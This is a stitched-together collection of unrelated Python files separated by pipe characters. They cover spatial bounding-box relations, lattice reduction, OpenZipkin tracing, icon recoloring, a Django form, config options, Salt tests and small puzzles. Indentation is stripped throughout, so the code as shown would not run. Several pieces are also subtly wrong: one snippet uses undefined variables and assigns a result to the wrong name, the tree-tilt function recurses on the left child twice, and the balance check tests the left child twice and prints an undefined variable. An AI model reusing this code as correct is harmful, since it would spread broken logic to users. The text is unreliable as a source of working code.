bbs1 = np.random.uniform(min_xywh,max_xywh, size=(nr_of_bb, 4))
bbs2 = np.random.uniform(min_xywh,max_xywh, size=(nr_of_bb, 4))
bbs12 = np.concatenate([bbs1,bbs2],axis=0)
bbst = np.random.uniform([0, 0, .2, .2], [1, 1, 1, 1], size=(nr_of_bb, 4))
# funcitions that ocmputes training examples or relations between BB
def angle(bb1,bb2):
c1 = bb1[:2] + .5*bb1[2:]
c2 = bb2[:2] + .5*bb2[2:]
x = c2 - c1
return np.angle(x[0] + 1j*x[1],deg=True)
def is_left(bb1,bb2):
return bb1[0] + bb1[2] < bb2[0] and np.abs(angle(bb1, bb2)) < 5
def is_not_left(bb1,bb2):
return bb1[0] + bb1[2] > bb2[0] or np.abs(angle(bb1, bb2)) > 45
def is_right(bb1, bb2):
return is_left(bb2,bb1)
def is_not_right(bb1,bb2):
return is_not_left(bb2,bb1)
def is_below(bb1, bb2):
return bb1[1] + bb1[3] < bb2[1] and np.abs(angle(bb1, bb2)-90) < 5
def is_not_below(bb1, bb2):
return bb1[1] + bb1[3] > bb2[1] or np.abs(angle(bb1, bb2)-90) > 45
def is_above(bb1, bb2):
return is_below(bb2,bb1)
def is_not_above(bb1,bb2):
return is_not_below(bb2,bb1)
def contains(bb1,bb2):
return bb1[0] < bb2[0] and bb1[0] + bb1[2] > bb2[0] + bb2[2] and \
bb1[1] < bb2[1] and bb1[1] + bb1[3] > bb2[1] + bb2[3]
def not_contains(bb1,bb2):
return not contains(bb1,bb2)
def is_in(bb1,bb2):
return contains(bb2,bb1)
def is_not_in(bb1,bb2):
return not is_in(bb1,bb2)
# pairs of rectangles for training
left_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_left(bbs1[i],bbs2[i])])
left_data = np.squeeze(left_data)
right_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_right(bbs1[i],bbs2[i])])
right_data = np.squeeze(right_data)
above_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_above(bbs1[i],bbs2[i])])
above_data = np.squeeze(above_data)
below_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_below(bbs1[i],bbs2[i])])
below_data = np.squeeze(below_data)
contain_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if contains(bbs1[i],bbs2[i])])
contain_data = np.squeeze(contain_data)
in_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_in(bbs1[i],bbs2[i])])
in_data = np.squeeze(in_data)
non_left_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_not_left(bbs1[i],bbs2[i])])
non_left_data = np.squeeze(non_left_data)
non_right_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_not_right(bbs1[i],bbs2[i])])
not_right_data = np.squeeze(non_right_data)
non_above_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_not_above(bbs1[i],bbs2[i])])
non_above_data = np.squeeze(non_above_data)
non_below_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_not_below(bbs1[i],bbs2[i])])
non_below_data = np.squeeze(non_below_data)
non_contain_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if not_contains(bbs1[i],bbs2[i])])
non_contain_data = np.squeeze(non_contain_data)
non_in_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_not_in(bbs1[i],bbs2[i])])
non_in_data = np.squeeze(non_in_data)
def generate_rectangles(nr_rectangles,min_xywh = [.0,.0,.2,.2],max_xywh = [1.,1.,1.,1.]):
return np.random.uniform(min_xywh,max_xywh, size=(nr_rectangles, 4)).astype("float32")
def angle(bbs1,bbs2):
c1 = bbs1[:,:2] + .5*bbs1[:,2:]
c2 = bbs2[:,:2] + .5*bbs2[:,2:]
x = c2 - c1
return np.angle(x[:,0] + 1j*x[:,1],deg=True)
def is_left(bbs1,bbs2):
return np.logical_and(bbs1[:,0] + bbs1[:,2] < bbs2[:,0],np.abs(angle(bbs1, bbs2)) < 5.)
def is_not_left(bbs1,bbs2):
return np.logical_or(bbs1[:,0] + bbs1[:,2] > bbs2[:,0], np.abs(angle(bbs1, bbs2)) > 45)
def is_right(bbs1, bbs2):
return is_left(bbs2,bbs1)
def is_not_right(bbs1,bbs2):
return is_not_left(bbs2,bbs1)
def is_below(bbs1, bbs2):
return np.logical_and(bbs1[:,1] + bbs1[:,3] < bbs2[:,1],np.abs(angle(bbs1, bbs2)-90) < 5)
def is_not_below(bbs1, bbs2):
return np.logical_or(bbs1[:,1] + bbs1[:,3] > bbs2[:,1],np.abs(angle(bbs1, bbs2)-90) > 45)
def is_above(bbs1, bbs2):
return is_below(bbs2,bbs1)
def is_not_above(bbs1,bbs2):
return is_not_below(bbs2,bbs1)
def contains(bbs1,bbs2):
return np.all([bbs1[:,0] < bbs2[:,0],
bbs1[:,0] + bbs1[:,2] > bbs2[:,0] + bbs2[:,2],
bbs1[:,1] < bbs2[:,1],
bbs1[:,1] + bbs1[:,3] > bbs2[:,1] + bbs2[:,3]],axis=0)
def not_contains(bbs1,bbs2):
return np.logical_not(contains(bbs1,bbs2))
def is_in(bbs1,bbs2):
return contains(bbs2,bbs1)
def is_not_in(bbs1,bbs2):
return np.logical_not(is_in(bbs1,bbs2))
# generations of data for negative examples and generic rectangles used to feed the variables x,y,z
nr_random_bbs = 50
def get_data(type):
feed_dict = {}
feed_dict["?left_xy"] = left_data
feed_dict["?right_xy"] = right_data
feed_dict["?below_xy"] = below_data
feed_dict["?above_xy"] = above_data
feed_dict["?contains_xy"] = non_contain_data[np.random.choice(len(non_contain_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?contained_in_xy"] = non_in_data[np.random.choice(len(non_in_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?non_left_data"] = non_left_data[np.random.choice(len(non_left_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?not_left_xy"] = non_right_data[np.random.choice(len(non_right_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?not_below_xy"] = non_below_data[np.random.choice(len(non_below_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?not_above_xy"] = non_above_data[np.random.choice(len(non_above_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?not_contains_xy"] = non_contain_data[np.random.choice(len(non_contain_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?not_contained_in_xy"] = non_in_data[np.random.choice(len(non_in_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?x"] = bbs12[np.random.choice(len(bbs12),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?y"] = bbs12[np.random.choice(len(bbs12),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?z"] = bbs12[np.random.choice(len(bbs12),nr_random_bbs,replace=True)].astype(np.float32)
return feed_dict
|
filename='update.test'
with open(filename) as f:
conf=[]
for line in f:
line=line.strip().split(',')
conf.append(line)
def update_data(d='d'):
if 'test' in conf:
print 'updated!!'
else:
print 'notupdate'
|
from __future__ import division
from fractions import Fraction
from vector import Vector
import unittest
def gcd(a, b):
while b:
a, b = b, a%b
return a
class IntegerLattice:
def __init__(s, *args):
if len(args) == 1 and hasattr(args[0], '__iter__'):
s.basis = list(args[0])
else:
s.basis = list(args)
if not all(isinstance(v, Vector) for v in s.basis):
raise ValueError("A lattice basis must be a list of instance of Vector.")
if not all(len(v) == len(s.basis[0]) for v in s.basis):
raise ValueError("All lattice basis must have the same size.")
if not all(all(isinstance(x, int) for x in v) for v in s.basis):
raise ValueError("This class is only implemented a lattice over the Integer ring.")
# Initialize "gcd" vector
v = list(s.basis[0])
for x in s.basis[1:]:
x = list(x)
v = [gcd(a, b) for a, b in zip(x, v)]
s.gcd_vector = v
def __repr__(s):
ret = s.__class__.__name__
ret += '(' + ', '.join(map(repr, s.basis)) + ')'
return ret
def __eq__(s, other):
if isinstance(other, IntegerLattice):
return s.basis == other.basis
elif hasattr(other, '__iter__'):
return s.basis == list(other)
else:
return False
def __str__(s):
return 'Integer Lattice with {} basis [{}]'.format(len(s.basis), ', '.join(map(str, s.basis)))
def is_point(s, v):
return all(divmod(x, y)[1] == 0 for x, y in zip(v, s.gcd_vector))
def gram_schmidt_orthgonalization(L):
bc = (Fraction, int)
basis = [Vector(list(x), base_class=bc) for x in L.basis]
ret = [basis[0]]
for j in range(1, len(basis)):
t = Vector([0 for _ in basis], base_class=bc)
for i in range(j):
t = t.add(ret[i].scalar_mult(Fraction(basis[j].inner_product(ret[i]), ret[i].inner_product(ret[i]))))
ret += [basis[j].sub(t)]
return ret
def is_LLL_basis(L, delta=3/4):
n = len(L.basis)
m = len(L.basis[0])
gs_basis = gram_schmidt_orthgonalization(L)
for i in range(1, n):
bi = L.basis[i]
for j in range(i):
bj_star = gs_basis[j]
if abs(bi.inner_product(bj_star) / (bj_star.norm()**2)) > 1/2:
return False
for i in range(n - 1):
if delta * gs_basis[i].norm()**2 > gs_basis[i+1].norm()**2:
return False
return True
def LLL(L, delta=3/4):
import copy
import math
L = copy.deepcopy(L)
n = len(L.basis)
while True:
for i in range(n):
for _j in range(i):
bi = L.basis[i]
j = i - _j - 1
bj = L.basis[j]
cij = int(math.floor(bi.inner_product(bj) / bj.inner_product(bj) + 0.5))
L.basis[i] = bi.sub(bj.scalar_mult(cij))
gs_basis = gram_schmidt_orthgonalization(L)
return_flag = True
for i in range(n - 1):
if delta * gs_basis[i].norm()**2 > gs_basis[i + 1].norm()**2:
L.basis[i], L.basis[i + 1] = L.basis[i + 1], L.basis[i]
return_flag = False
break
if return_flag:
return L
|
"""
Synthetic example with high concurrency. Used primarily to stress test the
library.
"""
import argparse
import contextlib
import sys
import time
import threading
import random
# Comment out to test against the published copy
import os
sys.path.insert(1, os.path.dirname(os.path.realpath(__file__)) + '/../..')
import opentracing
import zipkin_ot
def sleep_dot():
"""Short sleep and writes a dot to the STDOUT.
"""
time.sleep(0.05)
sys.stdout.write('.')
sys.stdout.flush()
def add_spans():
"""Calls the opentracing API, doesn't use any OpenZipkin-specific code.
"""
with opentracing.tracer.start_span(operation_name='trivial/initial_request') as parent_span:
parent_span.set_tag('url', 'localhost')
parent_span.log_event('All good here!', payload={'N': 42, 'pi': 3.14, 'abc': 'xyz'})
parent_span.set_tag('span_type', 'parent')
parent_span.set_baggage_item('checked', 'baggage')
rng = random.SystemRandom()
for i in range(50):
time.sleep(rng.random() * 0.2)
sys.stdout.write('.')
sys.stdout.flush()
# This is how you would represent starting work locally.
with opentracing.start_child_span(parent_span, operation_name='trivial/child_request') as child_span:
child_span.log_event('Uh Oh!', payload={'error': True})
child_span.set_tag('span_type', 'child')
# Play with the propagation APIs... this is not IPC and thus not
# where they're intended to be used.
text_carrier = {}
opentracing.tracer.inject(child_span.context, opentracing.Format.TEXT_MAP, text_carrier)
span_context = opentracing.tracer.extract(opentracing.Format.TEXT_MAP, text_carrier)
with opentracing.tracer.start_span(
'nontrivial/remote_span',
child_of=span_context) as remote_span:
remote_span.log_event('Remote!')
remote_span.set_tag('span_type', 'remote')
time.sleep(rng.random() * 0.1)
opentracing.tracer.flush()
def zipkin_ot_tracer_from_args():
"""Initializes OpenZipkin from the commandline args.
"""
parser = argparse.ArgumentParser()
parser.add_argument('--host', help='The OpenZipkin reporting service host to contact.',
default='localhost')
parser.add_argument('--port', help='The OpenZipkin reporting service port.',
type=int, default=9411)
parser.add_argument('--service_name', help='The OpenZipkin component name',
default='TrivialExample')
args = parser.parse_args()
return zipkin_ot.Tracer(
service_name=args.service_name,
collector_host=args.host,
collector_port=args.port,
verbosity=1)
if __name__ == '__main__':
print('Hello, ')
# Use OpenZipkin's opentracing implementation
with zipkin_ot_tracer_from_args() as tracer:
opentracing.tracer = tracer
for j in range(20):
threads = []
for i in range(64):
t = threading.Thread(target=add_spans)
threads.append(t)
t.start()
for t in threads:
t.join()
print('\n')
print(' World!')
|
"""
3,猴子吃桃问题:猴子第一天摘下若干个桃子,当即吃了一半,还不瘾,又多吃了一个。第二天早上又将剩下的桃子吃掉一半,又多吃了一个。
以后每天早上都吃了前一天剩下的一半零一个。到第10天早上想再吃时,见只剩下一个桃子了。求第一天共摘了多少。
"""
def find_x(day):
x = 3*(2**(day-1))-2
return x
print(find_x(10))
# a10=1
# a9=(a10+1)*2
# a8=(a9+1)*2
# ....
# 数学思想,正常人的思想
# res = 1
# for i in range(9):
# res += 1
# res *= 2
# print(res)
# 计算机的思想
res01 = 1
while True:
res = res01
for i in range(9):
res /= 2
res -= 1
if res == 1:
print(res01)
break
res01 += 1
|
from __future__ import annotations
from collections import deque
from dataclasses import dataclass
from types import SimpleNamespace
from typing import Deque, Optional
@dataclass
class Node:
data: int
left: Optional[Node] = None
right: Optional[Node] = None
def left_tree_value_bfs(root: Node):
result: Node = None
queue: Deque = deque()
queue.append(root)
left_most: Node = None
while len(queue) > 0:
level_len: int = len(queue)
left_most: Node = None
for children in range(level_len):
node: Node = queue.popleft()
if node.left:
queue.append(node.left)
if not left_most:
left_most = node.left
result = left_most
if node.right:
queue.append(node.right)
print(result)
def is_tree_height_balance(source: Node):
result = SimpleNamespace(is_balance=True)
def helper(source: Node):
if not source.left and not source.right:
return 0
left_height, right_height = 0, 0
if source.left:
left_height = helper(source.left) + 1
if source.left:
right_height = helper(source.right) + 1
if result.is_balance and abs(left_height - right_height) not in {0, 1}:
print(f"Tree is unbalance: {root}, {left_height} {right_height}")
result.is_balance = False
return max(left_height, right_height)
helper(source)
print(result)
# LeetCode Problem: 563
def binary_tree_tilt(root: Node):
if not root.left and not root.right:
return 0
tilt = 0
if root.left:
tilt = binary_tree_tilt(root.left)
if root.right:
tilt = binary_tree_tilt(root.left)
tilt += abs(root.left.data - root.right.data)
return tilt
root: Node = Node(2)
root.left = Node(1)
root.right = Node(3)
left_tree_value_bfs(root)
root = Node(1)
root.left = Node(2)
root.left.left = Node(4)
root.right = Node(3)
root.right.left = Node(5)
root.right.left.left = Node(7)
root.right.right = Node(6)
left_tree_value_bfs(root)
root = Node(3)
root.left = Node(9)
root.right = Node(20)
root.right.right = Node(7)
root.right.left = Node(15)
is_tree_height_balance(root)
root = Node(1)
root.left = Node(2)
root.right = Node(2)
root.left.right = Node(3)
root.left.left = Node(3)
root.left.left.right = Node(4)
root.left.left.left = Node(4)
is_tree_height_balance(root)
root: Node = Node(1)
root.left = Node(2)
root.right = Node(3)
print(f"Tilt Value of Tree: {binary_tree_tilt(root)}")
|
"""
Batch process Windows 10 and 7/8 icon file colorings
Python 3.x
"""
import io
import os
import sys
import struct
import statistics
from pprint import pprint
from colorsys import rgb_to_hls, hls_to_rgb
from PIL import Image # pip3 install pillow
"""
Windows10.ico:
Values: 25,559
Hue Avg: 45.228, Median: 45.149, Mode: 44.776, Stdev: 0.582, Min: 43.235, Max: 46.567
Sat Avg: 74.136, Median: 73.333, Mode: 82.353, Stdev: 5.108, Min: 64.510, Max: 87.255
Lum Avg: 92.817, Median: 94.161, Mode: 100.000, Stdev: 6.975, Min: 74.444, Max: 100.000
Windows7_8_no_label.ico:
Values: 31,355
Hue Avg: 48.765, Median: 48.358, Mode: 53.924, Stdev: 2.748, Min: 41.351, Max: 55.714
Sat Avg: 71.403, Median: 72.157, Mode: 84.510, Stdev: 10.190, Min: 30.392, Max: 97.843
Lum Avg: 76.613, Median: 79.661, Mode: 100.000, Stdev: 17.735, Min: 31.034, Max: 100.000
Google Material Design (GMD) color palette:
https://material-ui.com/customization/color/
With the base Win10 SL its between the 200 and 300 shade
"""
base_path = '../Controller/Resources/'
# Windows 10 color set tweak table
win10_hue = -45.228 # Hue offset
win10_table = [
# Output file name HUE (0-360) Sat Level scalar
["Win10set/Black.ico", win10_hue + 50.0, 0.0, 0.35], # grey 800 hsl(0, 0%, 26%)
["Win10set/Blue gray.ico", win10_hue + 200.0, 0.195, 0.73], # blueGrey 400 hsl(200, 15%, 54%)
["Win10set/Blue.ico", win10_hue + 207.0, 0.99, 0.92], # blue 400 hsl(207, 89%, 68%)
["Win10set/Brown.ico", win10_hue + 16.0, 0.215, 0.64], # brown 400 hsl(16, 18%, 47%)
["Win10set/Cyan.ico", win10_hue + 187, 0.79, 0.8], # cyan 300 hsl(187, 71%, 59%)
["Win10set/Gray.ico", win10_hue + 50.0, 0.0, 1.1], # grey 300 hsl(0, 0%, 88%)
["Win10set/Green.ico", win10_hue + 123.0, 0.45, 0.77], # green 400 hsl(123, 38%, 57%)
["Win10set/Lime.ico", win10_hue + 66.0, 0.78, 0.80], # lime 400 hsl(66, 70%, 61%)
["Win10set/Orange.ico", win10_hue + 36.0, 1.5, 0.86], # orange 300 hsl(36, 100%, 65%)
["Win10set/Pink.ico", win10_hue + 340.0, 0.92, 0.99], # pink 300 hsl(340, 83%, 66%)
["Win10set/Purple.ico", win10_hue + 291.0, 0.53, 0.815], # purple 300 hsl(291, 47%, 60%)
["Win10set/Red.ico", win10_hue + 1.0, 0.92, 0.85], # red 400 hsl(1, 83%, 63%)
["Win10set/Teal.ico", win10_hue + 174.0, 0.476, 0.69], # teal 300 hsl(174, 42%, 51%)
["Win10set/Yellow.ico", win10_hue + 54.0, 1.22, 0.91] # yellow 400 hsl(54, 100%, 67%)
]
# Windows 7 & 8 base icon tweak table
# TODO: Windows 7/8 icons set could use more TLC. The LS parts are not tweaked, just copied from the Win10 set above
win7_8_hue = -48.765
win7_8_table = [
["Win7_8set/Black.ico", win7_8_hue + 50.0, 0.0, 0.35], # grey 800 hsl(0, 0%, 26%)
["Win7_8set/Blue gray.ico", win7_8_hue + 200.0, 0.195, 0.73], # blueGrey 400 hsl(200, 15%, 54%)
["Win7_8set/Blue.ico", win7_8_hue + 207.0, 0.99, 0.92], # blue 400 hsl(207, 90%, 61%)
["Win7_8set/Brown.ico", win7_8_hue + 16.0, 0.215, 0.64], # brown 400 hsl(16, 18%, 47%)
["Win7_8set/Cyan.ico", win7_8_hue + 187, 0.79, 0.8], # cyan 300 hsl(187, 71%, 59%)
["Win7_8set/Gray.ico", win7_8_hue + 50.0, 0.0, 1.1], # grey 300 hsl(0, 0%, 88%)
["Win7_8set/Green.ico", win7_8_hue + 123.0, 0.45, 0.77], # green 400 hsl(123, 38%, 57%)
["Win7_8set/Lime.ico", win7_8_hue + 66.0, 0.78, 0.83], # lime 400 hsl(66, 70%, 61%)
["Win7_8set/Orange.ico", win7_8_hue + 36.0, 1.5, 0.88], # orange 300 hsl(36, 100%, 65%)
["Win7_8set/Pink.ico", win7_8_hue + 340.0, 0.92, 0.99], # pink 300 hsl(340, 83%, 66%)
["Win7_8set/Purple.ico", win7_8_hue + 291.0, 0.53, 0.815], # purple 300 hsl(291, 47%, 60%)
["Win7_8set/Red.ico", win7_8_hue + 1.0, 0.92, 0.85], # red 400 hsl(1, 83%, 63%)
["Win7_8set/Teal.ico", win7_8_hue + 174.0, 0.476, 0.69], # teal 300 hsl(174, 42%, 51%)
["Win7_8set/Yellow.ico", win7_8_hue + 54.0, 1.22, 0.91] # yellow 400 hsl(54, 100%, 67%)
]
# Apply hue to a copy of the base image and save it
def apply_color(im, out_path, hue_o, sat_s, lum_s, isWin10):
print("%s:" % out_path)
# PIL uses scalar values
hue_o /= 360.0
assert hue_o <= 1.0
label_x_limit = 1000
# Apply color tweak to each sub-icon from the base input set
out_frames = []
for i in range(im.ico.nb_items):
png_im = im.ico.frame(i)
pxi = png_im.load()
print(" [%u] size: %u" % (i, png_im.width))
# Approximate Win 7/8 label x start position
if not isWin10:
label_x_limit = (png_im.width * 0.6)
new_im = Image.new("RGBA", (png_im.width, png_im.width), "purple")
pxo = new_im.load()
for y in range(png_im.width):
for x in range(png_im.width):
# Pixel from RGB to HLS color space
r, g, b, a = pxi[x, y]
# No need to colorize transparent pixels
if a > 0:
h, l, s = rgb_to_hls(float(r) / 255.0, float(g) / 255.0, float(b) / 255.0)
# Leave the Windows 7/8 folder label alone
# The label is white (zero'ish hue) and blue range(around 90 to 300)
if not ((x >= label_x_limit) and (h < (40.0 / 360.0)) or (h > (100.0 / 360.0))):
# Tweak pixel
h = (h + hue_o)
# Hue is circular, let it wrap around
if h > 1.0:
h -= 1.0
s = min(1.0, (s * sat_s))
l = min(1.0, (l * lum_s))
# Back to RGB from HLS
r, g, b = hls_to_rgb(h, l, s)
r = min(int(r * 255.0), 255)
g = min(int(g * 255.0), 255)
b = min(int(b * 255.0), 255)
pxo[x, y] = (r, g, b, a)
#new_im.show()
out_frames.append(new_im)
"""
Write out the the modified icon copy.
PIL(Pillow) while supports full loading of multi-size embedded.ico files, it has limited support for writing
them back out. It takes the first/parent image and saves out scaled down filtered thumbnail sizes instead.
The IcoImageFile _save() function was almost complete though. Here is a copy of that code with the copy part
replaced with individual "frame" writes instead.
As an added bonus from the code, it saves the icon sections out as compressed .png sections (supported since Windows Vista)
which makes our icon sets much smaller than the default BMP section format that most icon tools use.
"""
fp = open(base_path + out_path, 'wb')
fp.write(b"\0\0\1\0") # Magic
fp.write(struct.pack("<H", len(out_frames))) # idCount(2)
offset = (fp.tell() + len(out_frames) * 16)
for ni in out_frames:
width, height = ni.width, ni.height
# 0 means 256
fp.write(struct.pack("B", width if width < 256 else 0)) # bWidth(1)
fp.write(struct.pack("B", height if height < 256 else 0)) # bHeight(1)
fp.write(b"\0") # bColorCount(1)
fp.write(b"\0") # bReserved(1)
fp.write(b"\0\0") # wPlanes(2)
fp.write(struct.pack("<H", 32)) # wBitCount(2)
image_io = io.BytesIO()
ni.save(image_io, "png")
image_io.seek(0)
image_bytes = image_io.read()
bytes_len = len(image_bytes)
fp.write(struct.pack("<I", bytes_len)) # dwBytesInRes(4)
fp.write(struct.pack("<I", offset)) # dwImageOffset(4)
current = fp.tell()
fp.seek(offset)
fp.write(image_bytes)
offset = offset + bytes_len
fp.seek(current)
fp.close()
print(" ")
# From Windows base icon image to our color sets
def process_icon_base(in_file, nfo_table, isWin10):
# Load base icon image
im = Image.open(in_file)
#print(in_file, im.info, im.format, im.size, im.mode)
# Build color sets
for e in nfo_table:
apply_color(im, e[0], e[1], e[2], e[3], isWin10)
# Windows 10
print("-- Creating Windows 10 set..")
process_icon_base("Windows10.ico", win10_table, True)
print("-- Creating Windows 7 & 8 set..")
process_icon_base("Windows7_8_rgba.ico", win7_8_table, False)
|
from django import forms
from django.conf import settings
from django.http import HttpResponse, HttpResponseRedirect, Http404
from manager import models as pmod
from . import templater
from django.conf import settings
import decimal, datetime
# This page allows an employee to make or edit a store
def process_request(request):
if not request.user.is_authenticated():
return HttpResponseRedirect('/manager/login')
if request.user.is_staff == False:
return HttpResponseRedirect('/manager/')
'''Shows the list of stores'''
if request.urlparams[0] == "new":
form = StoreForm(initial ={
'locationName': "",
'manager': "",
'street': "",
'city': "",
'state': "",
'zipcode': "",
'phone': "",
})
else:
store = pmod.Store.objects.get(id=request.urlparams[0])
form = StoreForm(initial ={
'locationName': store.locationName,
'manager': store.manager,
'street': store.street,
'city': store.city,
'state': store.state,
'zipcode': store.zipcode,
'phone': store.phone,
})
if request.method == 'POST':
form = StoreForm(request.POST)
if form.is_valid():
if request.urlparams[0] == "new":
store = pmod.Store()
store.locationName = form.cleaned_data['locationName']
store.manager = form.cleaned_data['manager']
store.street = form.cleaned_data['street']
store.city = form.cleaned_data['city']
store.state = form.cleaned_data['state']
store.zipcode = form.cleaned_data['zipcode']
store.phone = form.cleaned_data['phone']
store.active = True
store.save()
return HttpResponseRedirect('/manager/stores')
tvars = {
'form': form,
}
return templater.render_to_response(request, 'store_details.html', tvars)
class StoreForm(forms.Form):
locationName = forms.CharField(required=False, label='Location Name', widget=forms.TextInput(attrs={'class':'form-control'}))
manager = forms.ModelChoiceField(queryset=pmod.User.objects.filter(is_staff=True), label="Manager", widget=forms.Select(attrs={'class':'form-control'}))
street = forms.CharField(required=False, label='Street', widget=forms.TextInput(attrs={'class':'form-control'}))
city = forms.CharField(required=False, label='City', widget=forms.TextInput(attrs={'class':'form-control'}))
state = forms.CharField(required=False, label='State', widget=forms.TextInput(attrs={'class':'form-control'}))
zipcode = forms.CharField(required=False, label='Zipcode', widget=forms.TextInput(attrs={'class':'form-control'}))
phone = forms.CharField(required=False, label='Phone', widget=forms.TextInput(attrs={'class':'form-control'}))
#def clean_store_text(self): |
import json
from nativeconfig.exceptions import DeserializationError, ValidationError, InitializationError
from nativeconfig.options.base_option import BaseOption
class DictOption(BaseOption):
"""
DictOption represents Python dict in config. DictOption can contain other Options as values of dict.
"""
def __init__(self, name, value_option=None, **kwargs):
"""
Accepts all the arguments of BaseConfig except choices.
"""
super().__init__(name, getter='get_dict_value', setter='set_dict_value', **kwargs)
if value_option:
from nativeconfig.options import ArrayOption
if isinstance(value_option, BaseOption) \
and not isinstance(value_option, ArrayOption) \
and not isinstance(value_option, DictOption):
self._value_option = value_option
else:
raise InitializationError("Value option must be instance of one of base options except array and dict!")
else:
self._value_option = None
def serialize(self, value):
serializable_dict = {}
if isinstance(self._value_option, BaseOption):
for k, v in value.items():
serialized_v = self._value_option.serialize(v)
serializable_dict.update({k: serialized_v})
return serializable_dict
else:
return value
def deserialize(self, raw_value):
try:
if isinstance(self._value_option, BaseOption):
deserialized_dict = {}
for k, v in raw_value.items():
deserialized_dict.update({k: self._value_option.deserialize(v)})
value = deserialized_dict
else:
value = raw_value
except DeserializationError:
raise DeserializationError("Unable to deserialize \"{}\" into dict!".format(raw_value), raw_value)
else:
return value
def serialize_json(self, value):
serializable_dict = {}
if isinstance(self._value_option, BaseOption):
for k, v in value.items():
serialized_v = self._value_option.serialize(v)
serializable_dict.update({k: serialized_v})
return json.dumps(serializable_dict)
else:
return json.dumps(value)
def deserialize_json(self, json_value):
try:
value = json.loads(json_value)
except ValueError:
raise DeserializationError("Invalid json: \"{}\"".format(json_value), json_value)
else:
return value
def validate(self, value):
super().validate(value)
try:
valid_val = dict(value)
except (ValueError, TypeError):
raise ValidationError("Invalid dict \"{}\"!".format(value), value)
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Rahul Handay <[email protected]>`
'''
# Import Python Libs
from __future__ import absolute_import
# Import Salt Testing Libs
from salttesting import TestCase, skipIf
from salttesting.helpers import ensure_in_syspath
from salttesting.mock import (
MagicMock,
patch,
NO_MOCK,
NO_MOCK_REASON
)
ensure_in_syspath('../../')
# Import Salt Libs
from salt.states import win_servermanager
# Globals
win_servermanager.__salt__ = {}
win_servermanager.__opts__ = {}
@skipIf(NO_MOCK, NO_MOCK_REASON)
class WinServermanagerTestCase(TestCase):
'''
Validate the win_servermanager state
'''
def test_installed(self):
'''
Test to install the windows feature
'''
ret = {'name': 'salt',
'changes': {},
'result': True,
'comment': ''}
mock = MagicMock(side_effect=['salt', 'stack', 'stack'])
mock1 = MagicMock(return_value={'Success': 'True'})
with patch.dict(win_servermanager.__salt__,
{"win_servermanager.list_installed": mock,
"win_servermanager.install": mock1}):
ret.update({'comment': 'The feature salt is already installed'})
self.assertDictEqual(win_servermanager.installed('salt'), ret)
with patch.dict(win_servermanager.__opts__, {"test": True}):
ret.update({'changes': {'feature':
'salt will be installed'
' recurse=False'}, 'result': None,
'comment': ''})
self.assertDictEqual(win_servermanager.installed('salt'), ret)
with patch.dict(win_servermanager.__opts__, {"test": False}):
ret.update({'changes': {'feature': {'Success': 'True'}},
'result': True, 'comment': 'Installed salt'})
self.assertDictEqual(win_servermanager.installed('salt'),
ret)
def test_removed(self):
'''
Test to remove the windows feature
'''
ret = {'name': 'salt',
'changes': {},
'result': True,
'comment': ''}
mock = MagicMock(side_effect=['stack', 'salt', 'salt'])
mock1 = MagicMock(return_value={'Success': 'True'})
with patch.dict(win_servermanager.__salt__,
{"win_servermanager.list_installed": mock,
"win_servermanager.remove": mock1}):
ret.update({'comment': 'The feature salt is not installed'})
self.assertDictEqual(win_servermanager.removed('salt'), ret)
with patch.dict(win_servermanager.__opts__, {"test": True}):
ret.update({'changes': {'feature':
'salt will be removed'},
'result': None, 'comment': ''})
self.assertDictEqual(win_servermanager.removed('salt'), ret)
with patch.dict(win_servermanager.__opts__, {"test": False}):
ret.update({'changes': {'feature': {'Success': 'True'}},
'result': True})
self.assertDictEqual(win_servermanager.removed('salt'),
ret)
if __name__ == '__main__':
from integration import run_tests
run_tests(WinServermanagerTestCase, needs_daemon=False)
|
from dataclasses import dataclass
from bindings.gmd.md_geometric_objects_type import MdGeometricObjectsType
__NAMESPACE__ = "http://www.isotc211.org/2005/gmd"
@dataclass
class MdGeometricObjects(MdGeometricObjectsType):
class Meta:
name = "MD_GeometricObjects"
namespace = "http://www.isotc211.org/2005/gmd"
|
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
import math
from collections import OrderedDict
from ..util import import_
import numpy as np
from ..symbolic import SymbolicSys, TransformedSys, symmetricsys
sp = import_('sympy')
ys = [
np.array([0.43976714474700634, 0.10031118340143896, 0.38147224769822524,
1.7675704061619617e-11]),
np.array([0.00064313123504933787, 0.00014677490343001067, 9.536739572030514e-05, 1.6877253332428752e-11])
]
ps = [
[328.65, 39390, -135.3, 18010, 44960, 48.2,
49320, -114.6, 1780, -47941.550570419757,
107.24619394365152, 67486.458673807123, -170.63617364489184],
[321.14999999999998, 39390, -135.30000000000001, 18010, 44960, 48.200000000000003,
49320, -114.59999999999999, 1780, -34400.547966379738,
-2.865040967667511, 93065.338440593958, 5.7581184659305222]
]
